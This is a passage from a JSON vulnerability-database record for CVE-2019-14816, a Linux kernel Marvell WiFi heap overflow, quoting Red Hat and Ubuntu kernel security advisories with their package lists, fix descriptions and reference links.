i/o on rbd\n(BZ#1796432)\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: kernel security and bug fix update\nAdvisory ID: RHSA-2020:0374-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:0374\nIssue date: 2020-02-04\nCVE Names: CVE-2019-14816 CVE-2019-14895 CVE-2019-14898 \n CVE-2019-14901 CVE-2019-17133 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 
7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nSecurity Fix(es):\n\n* kernel: heap overflow in mwifiex_update_vs_ie() function of Marvell WiFi\ndriver (CVE-2019-14816)\n\n* kernel: heap-based buffer overflow in mwifiex_process_country_ie()\nfunction in drivers/net/wireless/marvell/mwifiex/sta_ioctl.c\n(CVE-2019-14895)\n\n* kernel: heap overflow in marvell/mwifiex/tdls.c (CVE-2019-14901)\n\n* kernel: buffer overflow in cfg80211_mgd_wext_giwessid in\nnet/wireless/wext-sme.c (CVE-2019-17133)\n\n* kernel: incomplete fix for race condition between\nmmget_not_zero()/get_task_mm() and core dumping in CVE-2019-11599\n(CVE-2019-14898)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* [Azure][7.8] Include patch \"PCI: hv: Avoid use of hv_pci_dev-\u003epci_slot\nafter freeing it\" (BZ#1766089)\n\n* [Hyper-V][RHEL7.8] When accelerated networking is enabled on RedHat,\nnetwork interface(eth0) moved to new network namespace does not obtain IP\naddress. 
(BZ#1766093)\n\n* [Azure][RHEL 7.6] hv_vmbus probe pass-through GPU card failed\n(BZ#1766097)\n\n* SMB3: Do not error out on large file transfers if server responds with\nSTATUS_INSUFFICIENT_RESOURCES (BZ#1767621)\n\n* Since RHEL commit 5330f5d09820 high load can cause dm-multipath path\nfailures (BZ#1770113)\n\n* Hard lockup in free_one_page()-\u003e_raw_spin_lock() because sosreport\ncommand is reading from /proc/pagetypeinfo (BZ#1770732)\n\n* patchset for x86/atomic: Fix smp_mb__{before,after}_atomic() (BZ#1772812)\n\n* fix compat statfs64() returning EOVERFLOW for when _FILE_OFFSET_BITS=64\n(BZ#1775678)\n\n* Guest crash after load cpuidle-haltpoll driver (BZ#1776289)\n\n* RHEL 7.7 long I/O stalls with bnx2fc from not masking off scope bits of\nretry delay value (BZ#1776290)\n\n* Multiple \"mv\" processes hung on a gfs2 filesystem (BZ#1777297)\n\n* Moving Egress IP will result in conntrack sessions being DESTROYED\n(BZ#1779564)\n\n* core: backports from upstream (BZ#1780033)\n\n* kernel BUG at arch/powerpc/platforms/pseries/lpar.c:482! (BZ#1780148)\n\n* Race between tty_open() and flush_to_ldisc() using the\ntty_struct-\u003edriver_data field. (BZ#1780163)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Package List:\n\nRed Hat Enterprise Linux Client (v. 
7):\n\nSource:\nkernel-3.10.0-1062.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.12.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1062.12.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 
7):\n\nSource:\nkernel-3.10.0-1062.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.12.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1062.12.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 
7):\n\nSource:\nkernel-3.10.0-1062.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.12.1.el7.noarch.rpm\n\nppc64:\nbpftool-3.10.0-1062.12.1.el7.ppc64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.ppc64.rpm\nperf-3.10.0-1062.12.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\npython-perf-3.10.0-1062.12.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\n\nppc64le:\nbpftool-3.10.0-1062.12.1.el7.ppc64le.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debug-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-devel-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-headers-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.ppc64le.rpm\nperf-3.10.0-1062.12.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\npython-perf-3.10.0-1062.12.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\n\ns390x:\nbpftool-3.10.0-1062.12.1.el7.s390x.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm
\nkernel-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debug-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-devel-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-headers-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-kdump-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-1062.12.1.el7.s390x.rpm\nperf-3.10.0-1062.12.1.el7.s390x.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\npython-perf-3.10.0-1062.12.1.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\n\nx86_64:\nbpftool-3.10.0-1062.12.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 
7):\n\nppc64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\n\nppc64le:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 
7):\n\nSource:\nkernel-3.10.0-1062.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.12.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1062.12.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. 
References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-14816\nhttps://access.redhat.com/security/cve/CVE-2019-14895\nhttps://access.redhat.com/security/cve/CVE-2019-14898\nhttps://access.redhat.com/security/cve/CVE-2019-14901\nhttps://access.redhat.com/security/cve/CVE-2019-17133\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXjnG/NzjgjWX9erEAQiZpA/+PrziwQc9nitsDyWqtq556llAnWG2YjEK\nkzbq/d3Vp+7i0aaOHXNG9b6XDgR8kPSLnb/2tCUBQKmLeWEptgY6s24mXXkiAHry\nplZ40Xlmca9cjPQCSET7IkQyHlYcUsc9orUT3g1PsZ0uOxPQZ1ivB1utn6nyhbSg\n9Az/e/9ai7R++mv4zJ7UDrDzuGPv5SOtyIcfuUyYdbuZO9OrmFsbWCRwG+cVvXJ6\nq6uXlIpcWx4H7key9SiboU/VSXXPQ0E5vv1A72biDgCXhm2kYWEJXSwlLH2jJJo7\nDfujB4+NSnDVp7Qu0aF/YsEiR9JQfGOOrfuNsmOSdK3Bx3p8LkS4Fd9y3H/fCwjI\nEOoXerSgeGjB5E/DtH24HKu1FB5ZniDJP69itCIONokq6BltVZsQRvZxpXQdmvpz\nhTJIkYqnuvrkv2liCc8Dr7P7EK0SBPhwhmcBMcAcPHE8BbOtEkcGzF2f2/p/CQci\nN0c4UhB2p+eSLq+W4qG4W/ZyyUh2oYdvPjPCrziT1qHOR4ilw9fH9b+jCxmAM7Lh\nwqj3yMR9YhUrEBRUUokA/wjggmI88u6I8uQatbf6Keqj1v1CykMKF3AEC5qfxwGz\nhk0YzSh0YK6DfybzNxcZK/skcp0Ga0vD+El/nXFI0WGXB8LsQiOUBgfp1JyAlXT6\nIwzrfQ6EsXE=\n=mofI\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nEnhancement(s):\n\n* Selective backport: perf: Sync with upstream v4.16 (BZ#1782748)\n\n4. Please note that the RDS protocol is blacklisted in Ubuntu by\ndefault. 
=========================================================================\nUbuntu Security Notice USN-4163-2\nOctober 23, 2019\n\nlinux-lts-xenial, linux-aws vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 ESM. \n\nIt was discovered that a race condition existed in the ARC EMAC ethernet\ndriver for the Linux kernel, resulting in a use-after-free vulnerability. \nAn attacker could use this to cause a denial of service (system crash). \n(CVE-2016-10906)\n\nIt was discovered that a race condition existed in the Serial Attached SCSI\n(SAS) implementation in the Linux kernel when handling certain error\nconditions. A local attacker could use this to cause a denial of service\n(kernel deadlock). (CVE-2017-18232)\n\nIt was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not\nhandle detach operations correctly, leading to a use-after-free\nvulnerability. \n(CVE-2018-21008)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. (CVE-2019-14814,\nCVE-2019-14816)\n\nMatt Delco discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly perform bounds checking when handling coalesced\nMMIO write operations. A local attacker with write access to /dev/kvm could\nuse this to cause a denial of service (system crash). (CVE-2019-14821)\n\nHui Peng and Mathias Payer discovered that the USB audio driver for the\nLinux kernel did not properly validate device meta data. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). 
(CVE-2019-15117)\n\nHui Peng and Mathias Payer discovered that the USB audio driver for the\nLinux kernel improperly performed recursion while handling device meta\ndata. A physically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2019-15118)\n\nIt was discovered that the Technisat DVB-S/S2 USB device driver in the\nLinux kernel contained a buffer overread. A physically proximate attacker\ncould use this to cause a denial of service (system crash) or possibly\nexpose sensitive information. (CVE-2019-15505)\n\nBrad Spengler discovered that a Spectre mitigation was improperly\nimplemented in the ptrace susbsystem of the Linux kernel. A local attacker\ncould possibly use this to expose sensitive information. (CVE-2019-15902)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n linux-image-4.4.0-1056-aws 4.4.0-1056.60\n linux-image-4.4.0-166-generic 4.4.0-166.195~14.04.1\n linux-image-4.4.0-166-generic-lpae 4.4.0-166.195~14.04.1\n linux-image-4.4.0-166-lowlatency 4.4.0-166.195~14.04.1\n linux-image-4.4.0-166-powerpc-e500mc 4.4.0-166.195~14.04.1\n linux-image-4.4.0-166-powerpc-smp 4.4.0-166.195~14.04.1\n linux-image-4.4.0-166-powerpc64-emb 4.4.0-166.195~14.04.1\n linux-image-4.4.0-166-powerpc64-smp 4.4.0-166.195~14.04.1\n linux-image-aws 4.4.0.1056.57\n linux-image-generic-lpae-lts-xenial 4.4.0.166.145\n linux-image-generic-lts-xenial 4.4.0.166.145\n linux-image-lowlatency-lts-xenial 4.4.0.166.145\n linux-image-powerpc-e500mc-lts-xenial 4.4.0.166.145\n linux-image-powerpc-smp-lts-xenial 4.4.0.166.145\n linux-image-powerpc64-emb-lts-xenial 4.4.0.166.145\n linux-image-powerpc64-smp-lts-xenial 4.4.0.166.145\n linux-image-virtual-lts-xenial 4.4.0.166.145\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. 
\n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 7) - noarch, x86_64\n\n3. \n\nBug Fix(es):\n\n* patchset for x86/atomic: Fix smp_mb__{before,after}_atomic() [kernel-rt]\n(BZ#1772522)\n\n* kernel-rt: update to the RHEL7.7.z batch#4 source tree (BZ#1780322)\n\n* kvm nx_huge_pages_recovery_ratio=0 is needed to meet KVM-RT low latency\nrequirement (BZ#1781157)\n\n* kernel-rt: hard lockup panic in during execution of CFS bandwidth period\ntimer (BZ#1788057)\n\n4",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14816"
},
{
"db": "PACKETSTORM",
"id": "156020"
},
{
"db": "PACKETSTORM",
"id": "157042"
},
{
"db": "PACKETSTORM",
"id": "156213"
},
{
"db": "PACKETSTORM",
"id": "156603"
},
{
"db": "PACKETSTORM",
"id": "154897"
},
{
"db": "PACKETSTORM",
"id": "154934"
},
{
"db": "PACKETSTORM",
"id": "154946"
},
{
"db": "PACKETSTORM",
"id": "156216"
},
{
"db": "PACKETSTORM",
"id": "154935"
}
],
"trust": 1.71
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2019-14816",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "155212",
"trust": 1.6
},
{
"db": "PACKETSTORM",
"id": "154951",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2019/08/28/1",
"trust": 1.6
},
{
"db": "PACKETSTORM",
"id": "156020",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "154897",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "156216",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "156608",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "157140",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.0415",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.3817",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1172",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4252",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.3570",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4346",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.0790",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3064",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.0766",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.3897",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.3835",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4346.2",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1248",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201908-2176",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "157042",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "156213",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "156603",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154934",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154946",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154935",
"trust": 0.1
}
],
"sources": [
{
"db": "PACKETSTORM",
"id": "156020"
},
{
"db": "PACKETSTORM",
"id": "157042"
},
{
"db": "PACKETSTORM",
"id": "156213"
},
{
"db": "PACKETSTORM",
"id": "156603"
},
{
"db": "PACKETSTORM",
"id": "154897"
},
{
"db": "PACKETSTORM",
"id": "154934"
},
{
"db": "PACKETSTORM",
"id": "154946"
},
{
"db": "PACKETSTORM",
"id": "156216"
},
{
"db": "PACKETSTORM",
"id": "154935"
},
{
"db": "CNNVD",
"id": "CNNVD-201908-2176"
},
{
"db": "NVD",
"id": "CVE-2019-14816"
}
]
},
"id": "VAR-201909-1526",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.30555555
},
"last_update_date": "2026-03-09T20:55:45.836000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Linux kernel Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=97659"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201908-2176"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-122",
"trust": 1.0
},
{
"problemtype": "CWE-787",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14816"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 3.2,
"url": "https://www.openwall.com/lists/oss-security/2019/08/28/1"
},
{
"trust": 2.7,
"url": "https://access.redhat.com/security/cve/cve-2019-14816"
},
{
"trust": 2.3,
"url": "https://access.redhat.com/errata/rhsa-2020:0374"
},
{
"trust": 2.2,
"url": "https://usn.ubuntu.com/4157-1/"
},
{
"trust": 2.2,
"url": "https://access.redhat.com/errata/rhsa-2020:0339"
},
{
"trust": 1.7,
"url": "https://access.redhat.com/errata/rhsa-2020:0174"
},
{
"trust": 1.7,
"url": "https://access.redhat.com/errata/rhsa-2020:0661"
},
{
"trust": 1.7,
"url": "https://access.redhat.com/errata/rhsa-2020:0375"
},
{
"trust": 1.6,
"url": "https://usn.ubuntu.com/4163-2/"
},
{
"trust": 1.6,
"url": "https://usn.ubuntu.com/4162-1/"
},
{
"trust": 1.6,
"url": "https://access.redhat.com/errata/rhsa-2020:0328"
},
{
"trust": 1.6,
"url": "http://packetstormsecurity.com/files/155212/slackware-security-advisory-slackware-14.2-kernel-updates.html"
},
{
"trust": 1.6,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00064.html"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
},
{
"trust": 1.6,
